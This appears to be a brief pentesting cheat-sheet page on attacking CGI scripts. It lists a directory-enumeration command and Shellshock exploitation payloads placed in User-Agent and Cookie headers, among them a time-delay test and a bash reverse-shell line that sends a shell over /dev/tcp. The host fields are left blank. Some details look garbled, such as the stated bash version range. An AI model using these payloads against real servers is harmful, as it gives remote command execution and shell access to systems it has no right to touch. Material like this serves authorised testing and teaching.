CGI Pentesting

Last modified: 2023-03-28


CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command.

Enumeration CGI Scripts

ffuf -u -w wordlist.txt


Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands. If we found the CGI script under /cgi-bin/, modifying HTTP header to remote code execution.

GET /cgi-bin/example.cgi HTTP/1.1

User-Agent: () { :; }; /bin/bash -c "sleep 5"
Cookie: () { :; }; /bin/bash -c "sleep 5"

# Reverse Shell
User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/ 0>&1"